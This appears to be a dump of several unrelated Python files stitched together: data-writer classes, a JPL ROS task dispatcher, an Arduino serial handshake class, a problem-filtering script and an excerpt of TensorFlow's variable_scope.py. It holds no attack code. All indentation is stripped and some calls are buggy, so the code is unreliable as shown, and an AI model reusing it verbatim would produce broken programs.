np.save(output, data)
else:
raise ValueError('invalid type: {} to save to {}', type(data), path)
output = output.getvalue()
return self.writer.write(path, output)
class JsonWriter(Writer):
def __init__(self, writer: Writer):
self.writer = writer
def write(self, path: str, data: Union[List, Dict, bytes]):
if isinstance(data, list) or isinstance(data, dict):
output = json.dumps(data, ensure_ascii=False).encode(encoding='utf-8')
elif isinstance(data, bytes):
output = data
elif isinstance(data, str):
output = data.encode('utf-8')
else:
raise ValueError('invalid type: {} to save to {}', type(data), path)
return self.writer.write(path, output)
def build_writer(store_type: str, data_type: str, **kwargs) -> Writer:
if store_type == StoreType.LOCAL.type_name:
writer = LocalWriter()
elif store_type == StoreType.OSS.type_name:
writer = OssWriter(**kwargs)
else:
raise ValueError(f"Unknown store type: {store_type}")
if data_type == DataType.BYTES.type_name:
return BytesWriter(writer)
elif data_type == DataType.IMAGE.type_name:
return ImageWriter(writer)
elif data_type == DataType.NUMPY.type_name:
return NumpyWriter(writer)
elif data_type == DataType.JSON.type_name:
return JsonWriter(writer)
else:
raise ValueError(f"Unknown data type: {data_type}")
class AsyncWriter(object):
def __init__(self, pool_size: int, store_type: str, data_type: str, **config):
self.pool_size = pool_size
self.writer = build_writer(store_type=store_type, data_type=data_type, **config)
self.in_queue = Queue()
self.eof_sig = [None, None]
def worker_loop(writer: Writer, in_queue: Queue):
while True:
path, data = in_queue.get()
if path is None and data is None:
logger.info("Finish processing, exit...")
break
writer.write(path, data)
self.workers = []
for _ in range(self.pool_size):
p = Process(target=worker_loop, args=(self.writer, self.in_queue))
p.start()
self.workers.append(p)
def consume(self, data: Tuple[str, Any]):
self.in_queue.put(data)
def stop(self):
for _ in range(self.pool_size):
self.in_queue.put(self.eof_sig)
for p in self.workers:
p.join()
|
dispatcher.py
|
#!/usr/bin/python
'''
# =====================================================================
# Abstract PDRA dispatcher class
#
# Author: Marc Sanchez Net
# Date: 01/29/2019
# Copyright (c) 2019, Jet Propulsion Laboratory.
# =====================================================================
'''
# General imports
import abc
import ast
from Queue import PriorityQueue
from threading import Thread
import threading
# ROS imports
import rospy
# PDRA imports
from pdra.core import Obligation, Result
from pdra.utils import load_class_dynamically, now
# =====================================================================
# === Global variables
# =====================================================================
# Max size for the dispatcher queues. 0 = infinity
MAX_QUEUE_SIZE = 0
PUB_QUEUE_SIZE = 100
# Default timeout for a resource
RES_TIMEOUT = 600
# =====================================================================
# === Dispatchable Implementation
# =====================================================================
class Dispatcher(object):
""" Abstract dispatcher class.
:ivar string: agent_id
:ivar PriorityQueue: _up_queue
:ivar PriorityQueue: _dn_queue
:ivar dict: ohandlers
:ivar dict: rhandlers
:ivar object: chandler
"""
__metaclass__ = abc.ABCMeta
def __init__(self, agent_id):
""" Class constructor
:param string: Agent ID
"""
# Store variables
self.agent_id = agent_id
# Incoming queue (from back-end up to front-end)
self._up_queue = PriorityQueue(maxsize=MAX_QUEUE_SIZE)
# Outgoing queue (from front-end to back-end)
self._dn_queue = PriorityQueue(maxsize=MAX_QUEUE_SIZE)
# Communication Handler
self.chandler = None
# Dictionary {resource_id: obligation_handler object}
self.ohandlers = {}
# Dictionary {resource_id: resource_handler object}
self.rhandlers = {}
# Exit all threads upon rospy shutdown
rospy.on_shutdown(self._shutdown_dispatcher)
# Run the dispatcher and acceptor
self.run()
@abc.abstractmethod
def where_to_process(self, *args, **kwargs):
pass
@abc.abstractmethod
def process_rac_output(self, *args, **kwargs):
pass
def run(self):
# Start forwarder in a separate thread
self.th_fwdr = Thread(target=self._run_forwarder)
self.th_fwdr.setDaemon(True)
self.th_fwdr.start()
# Start acceptor in a separate thread
self.th_acptr = Thread(target=self._run_acceptor)
self.th_acptr.setDaemon(True)
self.th_acptr.start()
def _shutdown_dispatcher(self):
# Signal the forwarder and acceptor that they must exit
self._up_queue.put_nowait((-float('inf'), 'exit'))
self._dn_queue.put_nowait((-float('inf'), 'exit'))
# Stop all obligation handlers
for oh in self.ohandlers.values():
oh._shutdown()
# Stop all resource handlers
for rh in self.rhandlers.values():
rh._shutdown()
def _run_forwarder(self):
""" The forwarder pulls from ``self._dn_queue`` and directs the
dispatchable depending on the RAC input
"""
while True:
# Get the next dispatchable. If empty, block
priority, dsp = self._dn_queue.get(True)
# If dsp signals exit, you are done
if dsp == 'exit':
break
# Check if this dispatchable is valid. If not, log error
if not dsp.valid:
self._logerr('[Forwarder] Invalid dispatchable:\n Requesting agent is {}\nType is {}\nResource ID is {}\n TTL is {}, creation time is {}, and now is {} (remaining TTL {})'.format(
dsp.req_agent, dsp.type, dsp.resource_id, dsp.TTL, dsp.creation_time, now(), -(now()-dsp.creation_time) + dsp.TTL))
self._logerr("srv_agent: {}, uid: {}, resource_id: {}, req_agent: {}, creation_time: {}, priority: {}, version: {}".format(
dsp.srv_agent,
dsp.uid,
dsp.resource_id,
dsp.req_agent,
dsp.creation_time,
dsp.priority,
dsp.version,
# dsp.values[:100],
))
continue
# If this dispatchable is a result, send it through the comm handler
if dsp.type == 'Result':
self.chandler._send_dispatchable(
dsp.srv_agent, dsp.req_agent, dsp)
continue
# If this dispatchable is an obligation, get the agent that must
# process it
srv_agent = self.where_to_process(dsp)
# If the serving agent is not the local agent, send it
if srv_agent not in (None, "UNKNOWN", self.agent_id):
self.chandler._send_dispatchable(dsp.req_agent, srv_agent, dsp)
continue
# If srv_agent is "None", the RAC thinks this should not be done.
# Create a crude result and bounce.
# TODO: we do not know the values expected by the obligation handler,
# since we have no idea of its internal format. So we just write our
# displeasure all over the serial stream.
if srv_agent is None:
# self._logerr('Resource {} not known by RAC. Attempting to satisfy locally'.format(
# dsp.resource_id))
self._logerr('Resource {} should not be executed according to RAC. Skipping!'.format(
dsp.resource_id))
bounced_result = Result.from_obligation(dsp,
srv_agent=self.agent_id,
values="BOUNCED")
self._new_result(bounced_result)
continue
# If srv_agent is "UNKNOWN", show message that you will default to local execution.
if srv_agent == "UNKNOWN":
self._logerr('Resource {} not known by RAC. Attempting to satisfy locally'.format(
dsp.resource_id))
# Send a new obligation to a local resource. If it is not available, just
# abandon it for now. TODO: Trigger some cancellations
try:
self.rhandlers[dsp.resource_id]._new_obligation(dsp)
except KeyError:
self._logerr(
'Resource {} is not available locally'.format(dsp.resource_id))
self._logerr('Resources available are {}'.format(
self.rhandlers.keys()))
def _run_acceptor(self):
""" The acceptor pulls from ``self._up_queue`` and directs the result
depending on whether it is local or remote.
"""
while True:
# Get the next result. If empty, block
priority, dsp = self._up_queue.get(True)
# If res signals exit, you are done
if dsp == 'exit':
break
# Check if this dispatchable is valid. If not, log error
if not dsp.valid:
self._logerr('Invalid result at acceptor:\n Requesting agent is {}\nType is {}\nResource ID is {}\n TTL is {}, creation time is {}, and now is {} (remaining TTL {})'.format(
dsp.req_agent, dsp.type, dsp.resource_id, dsp.TTL, dsp.creation_time, now(), -(now()-dsp.creation_time) + dsp.TTL))
self._logerr("srv_agent: {}, uid: {}, resource_id: {}, req_agent: {}, creation_time: {}, priority: {}, version: {}".format(
dsp.srv_agent,
dsp.uid,
dsp.resource_id,
dsp.req_agent,
dsp.creation_time,
dsp.priority,
dsp.version,
# dsp.values[:100],
))
# self._logerr(dsp.to_json())
continue
# If this is an obligation coming from the comm handler, pass it to
# forwarder directly
if dsp.type == 'Obligation':
self._new_obligation(dsp)
continue
# If this result has dependents, create a dependent obligation and
# pass it to the forwarder for processing
if dsp.dependents is not None:
self._create_dependent(dsp)
continue
# If this result's requesting agent is not this agent, pass to forwarder
# so that it sends it using the comm handler
if dsp.req_agent != self.agent_id:
self._new_obligation(dsp)
continue
# If you reach this point, this result is for this agent. To see which resource
# triggered this (potential chain of) result(s), look at the predecessors
if not any(dsp.predecessors):
resource_id = dsp.resource_id
else:
resource_id = dsp.predecessors[0]['resource_id']
# Send the result to the appropriate obligation handler
try:
self.ohandlers[resource_id]._new_result(dsp)
except KeyError:
self._logerr(
'Obligation handler for resource {} is not available'.format(resource_id))
self._logerr('Obligation handlers are {}'.format(
self.ohandlers.keys()))
def _create_dependent(self, result):
self._loginfo('Creating dependent obligation from {}'.format(result))
# Get the next dependent resource
resource_id = result.dependents.pop(0)
# If list of dependents of empty, reset to None
if not any(result.dependents):
result.dependents = None
# Get the parameters of the dependent obligation as the values
# from the current result
params = result.values
# Create new obligation
obl = Obligation.from_result(result, resource_id, params)
# Enqueue new obligation for processing
self._new_obligation(obl)
def _new_obligation(self, dsp):
# Put the obligation in the outgoing queue to process
self._dn_queue.put_nowait((dsp.priority, dsp))
def _new_result(self, res):
# Put the result in the incoming queue to process
self._up_queue.put_nowait((res.priority, res))
def _add_obligation_handler(self, oh_id, oh_type, directory='.', **kwargs):
# Get handler class
self.ohandlers[oh_id] = self._new_handler(
oh_id, oh_type, directory, **kwargs)
def _add_resource_handler(self, rh_id, rh_type, directory='.', **kwargs):
# Store new handler
self.rhandlers[rh_id] = self._new_handler(
rh_id, rh_type, directory, **kwargs)
def _add_comm_handler(self, ch_id, ch_type, directory='.', **kwargs):
# Store new handler
self.chandler = self._new_handler(ch_id, ch_type, directory, **kwargs)
def _new_handler(self, resource_id, handler_type, directory, **kwargs):
# Separate module and class name
module, class_name = handler_type.split('.')
# Load the class definition to be created
cls = load_class_dynamically(directory, module, class_name=class_name)
# Create the obligation handler object
return cls(self, self.agent_id, resource_id, **kwargs)
def _logerr(self, msg):
rospy.logerr("[{}/dispatcher]: {}".format(self.agent_id, msg))
def _logwarn(self, msg):
rospy.logwarn("[{}/dispatcher]: {}".format(self.agent_id, msg))
def _loginfo(self, msg):
rospy.loginfo("[{}/dispatcher]: {}".format(self.agent_id, msg))
# =====================================================================
# === Function to start the dispatcher
# =====================================================================
def start_dispatcher(cls):
# Get agent id
aid = rospy.get_param('~agent_id')
# Get the source directory for all handlers
source_dir = rospy.get_param('~source_dir')
# Get name and type of obligation handlers
ohandlers = ast.literal_eval(rospy.get_param('~ohandlers', '{}'))
# Get the parameters for the obligation handlers
oparams = ast.literal_eval(rospy.get_param('~ohandler_params', '{}'))
# Get name and type of resource handlers
rhandlers = ast.literal_eval(rospy.get_param('~rhandlers', '{}'))
# Get the parameters for the obligation handlers
rparams = ast.literal_eval(rospy.get_param('~rhandler_params', '{}'))
# Get the type of comm handler
ch_type = rospy.get_param('~chandler', '')
# Get the parameters for the obligation handlers
cparams = ast.literal_eval(rospy.get_param('~chandler_params', '{}'))
# Create the dispatcher
dispatcher = cls(aid)
# Add the comm handler
dispatcher._add_comm_handler(
'comm', ch_type, directory=source_dir, **cparams)
# Add all obligation handlers
for oh_id, oh_type in ohandlers.iteritems():
dispatcher._add_obligation_handler(oh_id, oh_type, directory=source_dir,
**oparams.get(oh_id, {}))
# Add all result handlers
for rh_id, rh_type in rhandlers.iteritems():
dispatcher._add_resource_handler(rh_id, rh_type, directory=source_dir,
**rparams.get(rh_id, {}))
# Wait until rospy shutdown
rospy.spin()
|
ArduinoConection.py
|
"""
* @author Kai Fischer
* @email kathunfischer@googlemail.com
* @desc Class to encapsulate the communication to the arduino using a serial com-port connection
"""
import serial
import time
import json
import serial.tools.list_ports
from threading import Thread
from userDefaultsHandler import getUUIDFromSettings
from helperClasses import DataBaseUtilities
class ArduinoConection:
def write(self, msg):
try:
self.__serCon.write(msg)
except serial.SerialTimeoutException:
self.__serCon = None
except Exception as e:
print("error from write:")
print(e)
def readline(self):
msg = ""
msg = self.__serCon.readline()
return msg
# returns wether a arduino ist connected to the host or not
def getArdConState(self):
# if no connection or error in connection
if (self.__serCon == None):
# try to get a new connection
if (self.SearchArdThread.is_alive() == False):
self.SearchArdThread = Thread(
target=self.__getSerCon(), args=(self,))
self.SearchArdThread.start()
return False
else:
return True
# returns wether another Arduino to Communicate with was found or not
def getArdComState(self):
return self.__conToArd
def resetArdCon(self):
self.__serCon = None
def __startComListener(self):
raise NotImplementedError
# searches all local ports for connected arduinos then checks if they respond correctly
# returns the SerialConnection to the first correct responding arduino
def __getSerCon(self):
self.__serCon = None
AllPorts = list(serial.tools.list_ports.comports())
for port in AllPorts:
# Handshake Process
testCon = serial.Serial(
port=port.device, baudrate=115200, timeout=2, write_timeout=2)
# on each new connection the arduino will restart, waiting for it
time.sleep(2)
testCon.write(str.encode("~echo~\n"))
answer = testCon.readline()
if (answer == str.encode("~ping~\n")):
# searching successfull
# set guid
# wait for response -> check if guid was correctly recieved
testCon.write(str.encode(str(self.__localId) + "\n"))
answer = testCon.readline()
if (answer != str.encode("~okay~\n")):
print("handshake failed")
self.__serCon = None
continue
else:
# handshake successfull
self.__serCon = testCon
break
return
def IsSerCon(self):
return self.__serCon != None
def __init__(self):
self.__localId = json.loads(json.dumps(getUUIDFromSettings()))['value']
print(self.__localId)
self.partnerId = None
self.__serCon = None
self.SearchArdThread = Thread()
self.getArdConState()
self.__conToArd = True
|
inter.py
|
import threading
import pickle
from problems import problems
from contestant import contestant
from connection import connection
import time
class inter:
def __init__(self,info):
self.loadedbase = problems.loadbase()
self.base = self.loadedbase['base']
self.basetime = self.loadedbase['time']
self.info = info
self.org = "new"
self.org = True
self.handlesfile = 'handles'
self.tagsfile = 'tags'
def gettags(self):
return problems.getalltags(self.base)
def connectthreading(self,handles):
self.thread = threading.Thread(target=lambda hadnles=handles:self.connect(handles))
self.thread.start()
def connect(self,handles):
self.connectioninfo = connection(contestant,handles).donemembers
def submit(self):
print('self.org',self.org)
if self.org == True:
self.parse()
elif self.org==False:
self.connectthreading(self.info['handles'])
while self.thread.isAlive():
pass
self.org=False
contestantsinfo = self.connectioninfo
probs = self.getprobs(self.info['tags'],self.info['tagoption'])
# print('tags',self.info['tags'],self.info['tagoption'])
probs = self.filterprobs(probs,contestantsinfo,self.info['filteroption'])
# print('probs',probs)
if len(probs)==0:
probs =['None found']
file = open('problems.txt','w',encoding='UTF-8')
for i in probs:
print(i,file = file)
file.close()
def getprobs(self,tags,tagoption):
probs = set()
if(tagoption==1):
probs = problems.containOnlyTags(self.base,tags)
elif(tagoption==2):
probs = problems.containSomeTags(self.base,tags)
elif(tagoption==3):
probs = problems.containAllTags(self.base,tags)
return probs
def filterprobs(self,probs,contestants,filteroption):
if filteroption ==1:
probs = problems.filterSubmissions(probs,contestants)
elif filteroption==2:
probs = problems.filterAccepted(probs,contestants)
return probs
def updatebase(self):
self.loadedbase = problems.updatebase()
self.base = self.loadedbase['base']
self.basetime = self.loadedbase['time']
def parse(self):
info=self.info
self.info={'handles':info.handles,'tagoption':info.tagoption.get(),'filteroption':info.filteroption.get(),'tags':info.tags}
def loadlast(self,filename):
print(f'loading from {filename}...')
file=open(filename,'rb')
load = pickle.load(file)
file.close()
return load
def picklelast(self,filename,tosave):
print(f'pickleing data...')
file = open(filename,'wb')
pickle.dump(tosave,file)
file.close()
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Set trainable value based on synchronization value.
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
